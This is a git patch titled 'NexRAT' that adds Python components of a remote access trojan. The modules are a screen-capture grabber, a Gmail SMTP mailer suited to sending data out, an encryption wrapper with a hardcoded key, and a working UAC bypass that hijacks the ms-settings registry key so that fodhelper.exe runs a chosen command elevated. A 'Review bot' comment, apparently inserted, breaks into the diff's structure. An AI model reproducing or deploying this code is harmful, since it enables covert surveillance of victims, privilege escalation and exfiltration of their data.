From 18a3d3bc354e667bc58385e59745b82b53695139 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:06:25 +0200
Subject: NexRAT

---
 Specific/encrypt.py    | 26 ++++++++++++
 Specific/grabber.py    | 113 +++++++++++++++++++++++++++++++++++++++++++++++++
 Specific/mail.py       | 21 +++++++++
 Specific/uac_bypass.py | 44 +++++++++++++++++++
 4 files changed, 204 insertions(+)
 create mode 100644 Specific/encrypt.py
 create mode 100644 Specific/grabber.py
 create mode 100644 Specific/mail.py
 create mode 100644 Specific/uac_bypass.py

(limited to 'Specific')

diff --git a/Specific/encrypt.py b/Specific/encrypt.py
new file mode 100644
index 0000000..6f88280
--- /dev/null
+++ b/Specific/encrypt.py
@@ -0,0 +1,26 @@
+import base64
+
+from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
+from cryptography.hazmat.backends import default_backend
+from cryptography.hazmat.primitives import hashes
+from cryptography.fernet import Fernet
+
+
+class Encryption:
+    def __init__(self, password='ksxgyRuBRJLKxjFeHD4nmxbE', salt=b'v4CuHZFzmTedBY2EBGrLRXsm'):
+        self.password = password
+        self.salt = salt
+        self.key = Fernet(self.generate_key())
+
+
+    def generate_key(self):
+        kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=self.salt, iterations=100000, backend=default_backend())
+        return base64.urlsafe_b64encode(kdf.derive(self.password.encode()))
+
+
+    def do_encrypt(self, message):
+        return self.key.encrypt(message)
+
+
+    def do_decrypt(self, ciphertext):
+        return self.key.decrypt(ciphertext)
\ No newline at end of file
diff --git a/Specific/grabber.py b/Specific/grabber.py
new file mode 100644
index 0000000..badec7c
--- /dev/null
+++ b/Specific/grabber.py
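Review bot: The `password` and `salt` defaults in `Encryption.__init__` are fixed literals in the source, so `generate_key` derives one and the same Fernet key for every copy of this file, and anyone holding the file can re-run it to decrypt any ciphertext produced with the defaults; nothing in the hunk documents this. I would state it on the class: `"""Fernet wrapper keyed by PBKDF2-HMAC-SHA256 over *password* and *salt*; with the default arguments the key is a constant of this module and is reproducible from the source."""`. Separately, `backend=default_backend()` on `PBKDF2HMAC` is accepted but ignored by current cryptography releases, so the import and argument carry no effect and could be noted as such.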
@@ -0,0 +1,113 @@
+from ctypes import Structure, c_int, POINTER, WINFUNCTYPE, windll, WinError, sizeof
+from ctypes.wintypes import BOOL, HWND, RECT, HDC, HBITMAP, HGDIOBJ, DWORD, LONG, WORD, UINT, LPVOID
+import numpy as np
+
+SRCCOPY = 0x00CC0020
+DIB_RGB_COLORS = 0
+BI_RGB = 0
+
+
+class BITMAPINFOHEADER(Structure):
+    _fields_ = [('biSize', DWORD),
+                ('biWidth', LONG),
+                ('biHeight', LONG),
+                ('biPlanes', WORD),
+                ('biBitCount', WORD),
+                ('biCompression', DWORD),
+                ('biSizeImage', DWORD),
+                ('biXPelsPerMeter', LONG),
+                ('biYPelsPerMeter', LONG),
+                ('biClrUsed', DWORD),
+                ('biClrImportant', DWORD)]
+
+
+def err_on_zero_or_null_check(result, func, args):
+    if not result:
+        raise WinError()
+    return args
+
+
+def quick_win_define(name, output, *args, **kwargs):
+    dllname, fname = name.split('.')
+    params = kwargs.get('params', None)
+    if params:
+        params = tuple([(x, ) for x in params])
+    func = (WINFUNCTYPE(output, *args))((fname, getattr(windll, dllname)), params)
+    err = kwargs.get('err', err_on_zero_or_null_check)
+    if err:
+        func.errcheck = err
+    return func
+
+
+GetClientRect = quick_win_define('user32.GetClientRect', BOOL, HWND, POINTER(RECT), params=(1, 2))
+GetDC = quick_win_define('user32.GetDC', HDC, HWND)
+CreateCompatibleDC = quick_win_define('gdi32.CreateCompatibleDC', HDC, HDC)
+CreateCompatibleBitmap = quick_win_define('gdi32.CreateCompatibleBitmap', HBITMAP, HDC, c_int, c_int)
+ReleaseDC = quick_win_define('user32.ReleaseDC', c_int, HWND, HDC)
+DeleteDC = quick_win_define('gdi32.DeleteDC', BOOL, HDC)
+DeleteObject = quick_win_define('gdi32.DeleteObject', BOOL, HGDIOBJ)
+SelectObject = quick_win_define('gdi32.SelectObject', HGDIOBJ, HDC, HGDIOBJ)
+BitBlt = quick_win_define('gdi32.BitBlt', BOOL, HDC, c_int, c_int, c_int, c_int, HDC, c_int, c_int, DWORD)
+GetDIBits = quick_win_define('gdi32.GetDIBits', c_int, HDC, HBITMAP, UINT, UINT, LPVOID, POINTER(BITMAPINFOHEADER), UINT)
+GetDesktopWindow = quick_win_define('user32.GetDesktopWindow', HWND)
+
+
+class Grabber(object):
+    def __init__(self, window=None, with_alpha=False, bbox=None):
+        window = window or GetDesktopWindow()
+        self.window = window
+        rect = GetClientRect(window)
+        self.width = rect.right - rect.left
+        self.height = rect.bottom - rect.top
+        if bbox:
+            bbox = [bbox[0], bbox[1], bbox[2] - bbox[0], bbox[3] - bbox[1]]
+            if not bbox[2] or not bbox[3]:
+                bbox[2] = self.width - bbox[0]
+                bbox[3] = self.height - bbox[1]
+            self.x, self.y, self.width, self.height = bbox
+        else:
+            self.x = 0
+            self.y = 0
+        self.windowDC = GetDC(window)
+        self.memoryDC = CreateCompatibleDC(self.windowDC)
+        self.bitmap = CreateCompatibleBitmap(self.windowDC, self.width, self.height)
+        self.bitmapInfo = BITMAPINFOHEADER()
+        self.bitmapInfo.biSize = sizeof(BITMAPINFOHEADER)
+        self.bitmapInfo.biPlanes = 1
+        self.bitmapInfo.biBitCount = 32 if with_alpha else 24
+        self.bitmapInfo.biWidth = self.width
+        self.bitmapInfo.biHeight = -self.height
+        self.bitmapInfo.biCompression = BI_RGB
+        self.bitmapInfo.biSizeImage = 0
+        self.channels = 4 if with_alpha else 3
+        self.closed = False
+
+
+    def __del__(self):
+        try:
+            self.close()
+        except:
+            pass
+
+
+    def close(self):
+        if self.closed:
+            return
+        ReleaseDC(self.window, self.windowDC)
+        DeleteDC(self.memoryDC)
+        DeleteObject(self.bitmap)
+        self.closed = True
+
+
+    def grab(self, output=None):
+        if self.closed:
+            raise ValueError('Grabber already closed')
+        if output is None:
+            output = np.empty((self.height, self.width, self.channels), dtype='uint8')
+        else:
+            if output.shape != (self.height, self.width, self.channels):
+                raise ValueError('Invalid output dimentions')
+        SelectObject(self.memoryDC, self.bitmap)
+        BitBlt(self.memoryDC, 0, 0, self.width, self.height, self.windowDC, self.x, self.y, SRCCOPY)
+        GetDIBits(self.memoryDC, self.bitmap, 0, self.height, output.ctypes.data, self.bitmapInfo, DIB_RGB_COLORS)
+        return output
\ No newline at end of file
diff --git a/Specific/mail.py b/Specific/mail.py
new file mode 100644
index 0000000..394d5a3
--- /dev/null
+++ b/Specific/mail.py
@@ -0,0 +1,21 @@
+import smtplib
+
+
+class Email:
+    def __init__(self, sender, sender_pw, recievers, subject, text):
+        self.sender = sender
+        self.sender_pw = sender_pw
+        self.recievers = recievers
+        self.subject = subject
+        self.text = text
+
+
+    def send_email(self):
+        message = f'From: {self.sender}\nTo: {", ".join(self.recievers)}\nSubject: {self.subject}\n\n{self.text}'
+
+        server = smtplib.SMTP('smtp.gmail.com', 587)
+        server.ehlo()
+        server.starttls()
+        server.login(self.sender, self.sender_pw)
+        server.sendmail(self.sender, self.recievers, message)
+        server.close()
\ No newline at end of file
diff --git a/Specific/uac_bypass.py b/Specific/uac_bypass.py
new file mode 100644
index 0000000..a8df662
--- /dev/null
+++ b/Specific/uac_bypass.py
@@ -0,0 +1,44 @@
+import winreg
+import ctypes
+import time
+import os
+
+from sys import exit
+
+FOD_HELPER = r'C:\Windows\System32\fodhelper.exe'
+REG_PATH = 'Software\Classes\ms-settings\shell\open\command'
+DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
+
+
+def is_running_as_admin():
+    try:
+        return ctypes.windll.shell32.IsUserAnAdmin()
+    except:
+        return False
+
+
+def create_reg_key(key, value):
+    try:
+        winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
+        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)
+        winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)
+        winreg.CloseKey(registry_key)
+    except WindowsError:
+        exit(0)
+
+
+def bypass_uac(cmd, timeout=2.5):
+    try:
+        time.sleep(timeout)
+        create_reg_key(DELEGATE_EXEC_REG_KEY, '')
+        create_reg_key(None, cmd)
+    except WindowsError:
+        exit(0)
+
+
+def Bypass(path):
+    try:
+        bypass_uac(path)
+        os.system(FOD_HELPER)
+    except WindowsError:
+        exit(0)
\ No newline at end of file
-- 
cgit v1.2.3